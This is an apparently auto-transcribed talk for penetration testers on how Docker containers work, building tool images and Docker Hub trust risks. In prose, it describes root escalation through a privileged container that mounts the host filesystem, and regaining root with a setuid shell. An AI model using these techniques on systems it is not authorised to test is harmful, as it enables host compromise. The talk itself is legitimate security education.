← All talks

Containers for Pentesters by Rory McCune

BSides Dublin · 202329:14105 viewsPublished 2023-07Watch on YouTube ↗
Speakers
Tags
CategoryTechnical
StyleTalk
Mentioned in this talk
Show transcript [en]

welcome along to this talk on containers for pen testers so I'm guessing by now a lot of people and we've even seen examples in the previous talk um of people using containers for a variety of things um what I wanted to do with this talk was talk a bit about containers I'm gonna have to go where it wants to go uh and then talk a bit about how they work because when we are looking to use things especially as pen testers which is kind of the point of this talk we want to understand how they work because if you're doing pen testing you can do some funny stuff it's easier to do that if you understand what your tools are

doing and how they actually operate and then I'll talk about some gotchas and some ideas you can use when you actually want to make use of these things so before I get started on the talk uh oh that's not gonna work let's do this very quick about me why am I giving this talk so uh my background is pen testing uh I'm told fairly recently I was a pen tester I did this for a number of companies for a number of years uh laterally I was looking at a lot of containerized environments love Docker a lot kubernetes uh these days I'm a senior security Advocate at datadoc if you've not heard of datadog we're a

large SAS observability and security company um a couple of things I do in the kind of cloud native community of kubernetes container Community I helped maintain the CIS benchmarks for Docker and kubernetes has anyone ever used either of those Ci's benchmarks or uci's benchmarks okay if you haven't if people haven't ucis benchmarks they are vendor neutral um hardening guides that you can get for pretty much any technology you want I helped maintain the ones for Docker and kubernetes I'm also a member of kubernetes six security and the cncf tag security these are kind of like special interest groups so if you're interested in like Cloud native security or container security um they're very easy to get involved

with you just come along to a zoom call either weekly or bi-weekly and they're a good place to find out what's going on to get some new discussions so if this is an area that you find yourself interested in very much recommend coming along to those so the first thing I wanted to talk about was what is a container because this is really important and not necessarily that widely understood um essentially when you start a Linux container what you are doing is starting a process right you're starting a program just like you're starting any other program so containers are just processes it's an important thing to remember the way that containers differ from your ordinary processes is all these kind of

boxes that go around it and these are all different ways that essentially the process is isolated from any other process running on that machine or isolated from the underlying host that's why if you're in a container you can't see by default all the files from the rest of the host these are all existing Linux features these are all things Linux does you can use these without using containers and I'm not going to go a lot in depth into those because it's quite a long topic if that one is one that's of Interest like how exactly do namespaces work then there's actually a series of blogs that I'm doing at the moment on desktop security Labs where we go into a

lot of detail about each of those at one in turn and I've got a link to that at the end of the uh at the end of the talk now as the last speaker was willing to do live demos I thought why not let's try and do some live demos so I'm going to demonstrate this try and make it a bit more real a bit more kind of like yep that's what's going on uh so let's go to right I've got a machine here this is uh just a Linux host running docker and I want to do PS uh we're gonna do PS ax FC engine X so what I'm doing here is I'm saying to this machine do you have

any nginx web servers running the answer is no I don't Okay cool so then we'll do is we'll say docker run helps back in time not that one that one we're going to use Docker run and we're going to run a container based on the nginx image which is that bit at the end we're going to get a name we'll call it web server and we'll write in the background so at this point I'm now running a Docker container that's what I just did I rocket container however from the machines perspective from this host perspective what have I done I've started nginx as far as that host is concerned all I did was start the nginx process running on

the machine just as though I'd installed nginx and started running it because it doesn't know about containers underlying host doesn't know what container is it just knows about processes so it thinks ah you're running a process then and I'm going to make note of this PID this process ID because one of the cool things that once you know that containers are just processes you can interact with them just by using Linux process tools you don't have to use the container tools and we can we can demonstrate that let's put this on the top we'll do Docker exec I'm gonna do Docker exec so Docker exec just executes a command inside a container and I'm going to create a new

file by saying touch my new file the main thing I want right I'm just going to create a file inside the container once I've done that and then say I want to get access to that file say I want to mess around with the files on my container and I don't want to use the standard container tools well because we know that containers are just processes I can go and find that processes file system and play with it and in this case all we need to do is use sudo LS slash proc and then my process ID root what I'm doing here is I'm going to list the files in a file in a directory in

the proc file system in Linux now the proc file system is a special file system in Linux it contains information about every process running on the machine amongst a lot of other things and one of the things you can do in the prop file system is get access to the root file system of any process containers are just processes I can get access to any container file system by going through prop and as we can see I can so you see there all those files there in the root file system are essentially what comes from the nginx image plus my new file which is the file I just created so literally once you know containers are processors

you can just play with use them like processes and if you're a pen tester you're thinking well how can I use these things well hopefully that makes a bit easier if you think okay I understand how this works so demo one worked awesome so what's Docker right so I use the docker command there the stuff I've been running so far has been Docker commands there are other container tools available but Docker is definitely the most used one if you're getting involved with containers for the first time I would recommend starting with Docker just because there's lots of tutorials and other information and it's easy to get hold of what does Docker do well look is

actually fairly straightforward Docker is a client so the docker client which I was just running there is a goal line binary client you can move that file around to different machines work the same way it talks to the docker demon and it talks over a Unix socket file so Unix socket file is just a way of making a server available without putting on the network but basically it's talking to a web server the docker Daemon is just a rest API if you're used to using rest apis you usually web app stuff then Docker demons pretty much a rest API the docker demon and then we'll go and get any images it needs from a container

registry it could be Docker Hub could be any of the other many many Registries which is also a rest API so if you're a pen tester and you've got a background in web app testing or web API testing you'll find that a lot of the stuff in container land is just a series of rest apis talking to each other they just hide it really well and there's like some nice fancy guis um and clis and then all of these are starting containers so that's all Docker actually does it basically says gives a rest API command to Docker Damon which then starts a process on the machine so it's actually not too complicated and we cannot demonstrate a bit about

how it works so if I do so count so if I do this command socat if you've not come across it is a really handy tool for playing with traffic and intersecting things this socat command basically just says give me a new socket file and then send any traffic you get to that socket file to the docker socket my so what I'm going to do is actually is put something as an intersection so I can look at traffic and see what's going by if I hit enter on that it will sit there quite happily and uh and listen and then in the other terminal if I do see if I then tell this terminal hey Docker

please go and talk to my temporary socket file that I just created and give me a list of container images he'll do that in this terminal it says okay there's your list of images what I would expect but back here we can actually see what happened and literally it's just a rest API what it does it starts off sending a head message to underscore ping so this is hey Docker Damon are you alive are you there it says yes I am I've got very nice distinctive user agent if you're ever looking for it gets back at 200. and it says great go to this API endpoint so just API version images Json really simple rest API and

Docker comes back and says cool there is a list of all the things big Json blog so doc really that's it what it does it's all it does it's really fairly simple it says I'm going to tell you to do various things with containers and you're going to launch them up for me one thing to mention um as pen testers you probably sometimes you sometimes need like fine grain control over what your machine what your tools are doing like what exact networking you're doing you do any low level testing anything to do with like Network sniffing Docker desktop is what you will use out of the box if you are running on Windows or Mac

um Docker desktop hides some complexity from you it looks very nice and it works really well but if you're doing networking I would kind of recommend avoiding it because what it does is it inserts this Docker desktop thing in the middle and it actually hides a Docker VM and that virtual machine you can't even see if you use like if you're on Windows you can't even see it in hyper-v manager it will not show up and it works really nicely if you're just doing developer work or you're doing like high level work if you're doing any network testing I would recommend avoiding this because it does quite a lot of fancy Network magic is the only way I can put it and

it's just going to get in the way of your tools what I would typically recommend is getting a VM you manage yourself and installing Docker on top of it don't use Docker desktop just worth knowing as pen testers really nice piece of software but does a lot of magic I don't like magic when I'm pen testing because it things break in the middle of a test I'm like why did you break and the answer is some complex magic when broke on me so a very important thing to know about Docker is Docker security model with the security model is what I always describe as flexible um what it is is Docker will say that anyone who can run Docker commands on

machine can be root on the machine that is by Design that's not Elite hack it's just the way it works it has all these different layers of isolation that I showed you on the graph earlier on and it says anyone who can run Docker commands can remove all of those layers of isolation at any time in any way they want so the culmination of this is this command here this rather long looking command this was from a Blog in 2015 by a guy who called it the most pointless Docker command ever when I was pen testing this was my favorite Docker command and I know how sad it is to have a favorite document command this is my favorite Docker

command and I'll and I'll show you why because we can demonstrate this one super simply Focus

so this Docker command very long what it basically does is this it first runs a flag called privileged and what actually has to talk to the guy in Docker who designed this flag and he said they wanted to call it insecure but their management wouldn't let them but that's what it is that's the removal the security flag which is great that it gives you one of those is the being of continual security existence the fact this thing was ever made because it's basically the total security off but it makes things work right so a lot of people will do it because hey things work really easily if I turn on security off we then say okay you know how we were

getting an isolated file systems and networking everything we don't want any of that we want the hosts networking we want the hosts process list we want to host everything we then want to mount the root file system from our local machine into the container and then we want to run the command host and you can guess what happens when I run this before I run this command I'm an ordinary user on this machine when I run this command I'm the root user it's that simple is that straightforward that is by Design that's how Docker works if you let anyone run containers on a machine if you're a pen tester and you find a Docker demon just run that

command and you get to be rude if you're doing kubernetes and you've got lots and lots of machines which basically kubernetes just runs lots of Docker machines on different hosts you can run kubernetes commands that do the exact same thing and you get to be root on every single machine in the cluster this is by design of the box that's how containers are meant to work it's very important to know when you're using them that's just how they work so why do we need these things as pen testers this was kind of the point of the talk um we've seen how they work we've seen what they do why is pen testers would we want to use these things for my money

there's a couple of reasons um first one is um if you're a pen tester you have a new environment for every customer every week and of course you never ever keep an environment from previous times that might leave test data from previous customers in the same place that has never happened to any pen tester ever yeah um containers make it a bit easier to keep that stuff clean right because whenever you start a container you get a new ephemeral environment right it goes away as soon as the all the configuration goes as soon as you stop that container you start another one it starts cleaning from the same template you had before containers make it easy

to get clean environments for your tools so you don't run that risk that I'm going to be all you know hanging dates with me hanging from previous times another thing is I'm guessing anyone who's ever been a pen test or has found some tool there aren't some obscure technology some web app that they don't normally do and they find a tool that someone wrote seven or eight years ago using a really old rookie version of pearl or python or node or whatever and it uses a whole lot of old libraries and old versions of language the last thing you want to be doing is installing all of those on your shared virtual machine because if you do that long enough you

will break your machine and everything will go wrong and node or python will start complaining horribly containers let you isolate those things in a nice little bundle that stays isolated and away from anything else so you don't have to worry about the fact it's going to make a right mess of my machine this is probably one of my favorite places to use containers is you can run old software all the way back to you know really old versions of browsers whatever else in a way that won't make a mess of your virtual machines so containers are good for that nothing they're good for is they're very easy to maintain we've been seeing some talks about CI CD and

GitHub actions and stuff like that it's really easy to make maintain containers using cicd you can have I'll show I usually have mine the ones I have I basically ping them every week they refresh and they rebuild so I don't want to pull my container it's no more than a week old every single time and again some customers were picky about you rocking up with really old out-of-day software so you can say hey look my software is already new because it gets maintained automatically last time is obviously as pen testers you're going to ask to test things like kubernetes clusters and the customer's defaults place will be give me your container image you want to run so you're going to

have to have them because customers expect so VM versus container obviously lots of people most testers I would say probably use Virtual machines I'm not going to tell you that it's always right to use containers sometimes virtual machines are the best option um the main difference for my money is size a VM image will end up being 10 20 30 40 gig quite easily containers you can get them all the way down to I think the smallest viable containers measured in kilobytes but realistically even my biggest most bloated container image that I just Chuck everything into is one or two gig so it's much easier to move around to say to a customer here is this

thing it's much smaller you don't have to worry about like you know file system limits or stuff all that as much but ultimately there's different ways of looking at it so see if you say you want to use containers and you're thinking to yourself where am I going to get my container images from the first place you will think to go to is dockerham Docker Hub has somewhere north of 8 million images currently available for you to download and run of those 8 million about 200 ish are what I would call semi-trusted as in they're maintained by Docker and either a commercial company or an open source project actually says we maintain them the other whatever 8 million minus a

couple of hundred is are totally untrusted could be literally anything doesn't matter what they say they are there is no curation at all they might take down malware where they get notified of it but realistically speaking most of the time that just means you'll get stuff that hasn't been patched in five years six years now there's this stuff up there just never gets passed the person puts the image up the user web they use it for they forget about it if you were searching for it you might end up pulling it down you get outdated software but you could also get images that are called like I think there are type of squatting attacks there is active malware on Docker Hub

there is anything you like typically the best thing to do is I would say that the official images never pull directed from Docker for production tests you're doing some research on a throwaway laptop fine don't worry too much about it if you're going to a customer's production environment and you're going to start running the tools from these images against customers production do not do this from Docker hub the reason I mention this specifically is this these are myself my images on Docker hub um these and these images the top one there is literally just Alpine Linux with a couple of networking tools that I literally did for throwaway years ago the next two are my kind of like kitchen

sink where I put all my container tools and those are the download stats I can promise you that I'm not even 0.1 of a percent of those download stats so some people somewhere in the world have decided to make heavy use of these images that I mean I put up there I make no profits about maintaining them not putting the malware in them not rickrolling anyone who runs them I see nothing about them they're known as any Assurance but that does not stop people doing it laptop is 1.75 million downloads I don't know who's doing it I have no way of knowing who's doing it I mean I could actually put a tracker into them

you can do that you can put trackers into container because I haven't I could um to find out what's going on but that's why I'm saying why it's a problem because people totally do this they just download images of Docker Hub and run them and you and if you're a pen tester and you're doing this production environments please don't do that make your own images making container images is fairly straightforward it's not super complex it's superb juice um one thing you can do with container images most of the time they'll actually generally be linked to a GitHub repository or something else and in there there'll be a thing called a Docker file I'll show you in a second

but Docker file syntax is really quite straightforward it's really fairly basic my typical rule of thumb is if I want to get someone's Docker image I just go and copy the docker file you speak a copy of it look at it build it myself because then I know what's in it and I know how to patch it and maintain it as needed it's not hard but do build your own images don't just use random members of Docker Hub because sooner or later someone will have bad optic I mean I'm a bad up sex role anyone knows I might have like left my Docker up if you actually lying somewhere someone steals it corrupts those images and suddenly

people are downloading them not good times so do make your own images in terms of what you do how you make those images there's two major approaches uh tool specific versus kitchen sink too specific I'm going to make one container image for every tool I run this is the purest sway if you talk to container purists they'll say containers should only run one process I'm a pen tester I'm not really a purist realistically speaking I have tried that approach it's a pain to maintain you have to have one image per two every time you go do an assessment you have to remember to put all the right images kitchen sink image you just put all your

tools in one image and run a bash shell so when I start the container it just runs a bachelor or Ash yellow area you like works perfectly well um that's typically how when I was a pen tester I would do it I would say for example I've had all my tools for container work put them into one image okay away you go so when you're choosing an image you want to build your own images I'm convinced your containers are a great idea um what do you do you have to pick a base distribution now there's lots of different options for this as I said there's hundreds of images you could use as base typically they all come down to choosing

a Linux distribution my advice here is pick the one that you're most familiar with people used to advise you always use Alpine at the top there because it was quite small and slim these days it's not so much of a problem um if you're a red hat person pick the red hat if you're a Ubuntu person pick a boot to Debian the only one I put the bottom is don't use Centos or at least don't use it from Docker hub the reason for that is the Centos image on Docker Hub is unmaintained it is an official image but it is unmaintained and unless you go to the website you won't know it's on minted because it doesn't say on

the command line anywhere you can totally build Jeremy's offset or seven and you'll get something that hasn't been patched I think since November last year might be November the year before that it's been a while anyway um and if you talk about images that shouldn't get used that does that one has millions of downloads lots and lots of millions anyway don't use Centos apart from that pick a distribution that you want there's one other option you can have which is at the top there it's called scratch and scratch essentially is give me a completely empty container image so if you're looking for super minimal super small you can start your image from scratch but it has no

operating system libraries in there at all it's like no time zone files no TLS certificate files that you might your program might need nothing I so only do that if you're doing like statically compiled binaries so if you're if your tools are all statically compiled binaries and you're super good at making them work on without supporting files scratch is kind of cool because it makes really small images Dr files like I said Docker files are not super complicated Docker file syntax is not highly obtuse basically it works like this you start off with a from which is your base image in this case Ubuntu 2204 which is my favorite base image you then basically say to the

docker file do whatever you would need to do to install the tool right in this case I'm installing a map so I just say run apt update okay I need to update app to get the latest packages available app to install minus y nmap and then app get clean the reason I do that all in one line and if you read Docker files you'll see tons of this and and and and this is do with how it builds up layers and basically it leaves files from earlier lines before if you don't delete them so you want to get everything on one line you want to clean up after yourself get rid of the cash put it all on one light

um and then you just say whenever this container is run run the command nmap it's super simple so that is an incredibly simple that is an airmap image that will happily run a map in a container [Applause] so I can demonstrate what are we doing for time we have seven minutes left uh maybe just do the second part of this then rather than the first let me get this I do want to mention one specific thing let's go back over here with this one yeah okay so this basically runs that command now the thing the reason I've had this command up is I wanted to mention it is what I did here was I said minus minus net host

so by default when Docker runs it gets an IP address on an isolated Network right and then it uses iptables under the covers doesn't tell you it's IP tables but it's just IP tables to essentially get the traffic out to the rest of the world if you're doing pen testing stuff like low level tools Wireshark edmap anything that does networking I generally advise putting net host on there because then you're running using the hosts network adapter you don't have to worry about any that stuff getting in the way making you know Nat tables filling up things breaking which it might do otherwise and you can run this quite happily and it will yeah episode from them and you can see

because of the way it's run anything I gave after the versus nmap is just treated as edmap Flags so just give it the nmat flags just like you're running a map on the host and it works quite happily and you get your mapped Flags I didn't run him up and you can do that for until you like so remember these things are just processes all you're doing is running a map just as though you're running on the machine except you've got to isolate it away and you can have an old version nmap or a specific build of something you need to have put in a container image and Away you go roof versus non-root um the other

canonical sin of containers is that all containers run as root by default this is because doc container people like things to work they don't like things not to work so they made the decision to make every single container run as root by default if you don't tell it otherwise you're running it through as a pen tester this is fantastic because what we do like doing is running because then things don't get in the way so much it's not as bad as running route in the host because you are still somehow isolated but if I was giving this talk to developers the first thing I always say is please stop running all your containers route because it makes it

easier to break out if there's a Linux kernel running as root mix it much easier to exploit that as pen testers we typically just want to run as root I would recommend as long as your customers are letting you do it run your containers it's the default enemy they'll probably be used to it um but there is a trick if you are told not to run out root so a good example of this if n was come across a tool called Red Hat openshift Red Hat this is their kubernetes this is their way of running containers and Enterprise if you do containers and Enterprise you will probably encounter openshift it has a default position of you will not do this

they've taken a sensible default of you will not run all your containers as root this is bad um but as pen testers we might say well okay we can't so then we give your customer you see I'm running a container in your cluster and they say you can't run that because it's run it's running it won't work and you okay I need a contain a container that doesn't run as root um there's a way to get rid back though which I wanted to mention because it's super simple all you do is you basically in your Docker file you say give me a set uid root shell and please see I've got it setting a set uid root there four

seven five five oh one fancy flash um and then all you do is you can then when you're running your container you just run that set your ID show and you're back to being root again now they can block that but it's not a default setting so if they've super hardened down their cluster that won't work but if they haven't super hardened down their cluster that will work and you get to be root again so if you're doing all your container stuff you can do it that way there's some other tricks as well but but that's an I I use that one quite a lot because otherwise you know I can run his room foreign

this is the one thing that will trip you up if you use containers when you run your container the file system is isolated right so we need to dump it I put the output of my M map command somewhere it's inside the container not outside the container so the obvious problem is how do I get my data back my test data back out to the to my host machine and that's really simple you just use that switch down there minus V see it says minus v test data uh we'll not try that again um it minus v test data and then Maps into the container's test data so anything I put in the test data

directory inside the container will turn up on my host in home directory slash test data and you can make those names anything you like but that's just the trick you need to know that when you're running these containers it's the one additional thing you have to think about is how do I get the data back out of the container when it's finished if I'm outputting to a file if you're not putting to screen don't worry about it it'll show up quite happily but if your output into a file you do need to know about that to the volume switch and that one works should work quite well so in conclusion containers are not too bad once you get used to them you have

to get your head around the idea of this thing running this kind of isolated process but they do help a lot they help keep your tool environments clean they help with when you go old groupie tools that were written in Pearl 10 years ago and have you maintained or the one thing that on your pen test you really need to make work and they also help if you are doing jobs in kubernetes and Docker environments which is ever more common um you know this is it you when you see these kind of jobs customers will start saying things like when I'm expecting you to build probably a container Mr run um yeah and they're very helpful if

you're doing kubernetes work as well there was quite a lot of stuff there so I put some resources um top one there is that's my kitchen sink image please copy that fork the repo have a look at it make sure you're happy with this on it build it yourself maintain it yourself or just take bits of it you like um next one down I did some of the tools specific I experimented with two specific images fundamentally I've not maintained them so again don't just run them please do check you want to maintain them before you use them um this year we're doing as we're doing a series on continuous security fundamentals so if you've looked at this

and thought yeah that's nice but how exactly does that work we're doing a lot more we've covered namespaces capabilities and c groups so far so we'll we'll get rid of all of them though uh this is like I maintain uh container Security Site this has got things like manifest if you want like our kubernetes manifest that will give you root on every single host in the cluster I've got one there so you can run that and see how it works and if it works then go and have words with the security team because that shouldn't work they should have blocked it uh and then lastly this one here I got annoyed because I couldn't find like all

the materials about container security that is there's an archive of 600 or there are 620 talks about Cloud native and container security from kubecon's and Cloud native security cons going back to 2016. um in the there's a search function so you can search any of them and just say I want to know more about kubernetes are back or I want to know more about um you know isolated containers and you'll find the whole place of stuff in there you can add to all of these on GitHub repos as well so if you want to add anything well not the data log one but all the other ones are GitHub repos so if you find something you want to

change or add Google requests are always welcome and we're dead on time and those are my contact details uh if you want to ask any questions probably on time now but there's my email address there's Mastodon if anyone's still on Twitter there's Twitter uh and hopefully that's been interesting foreign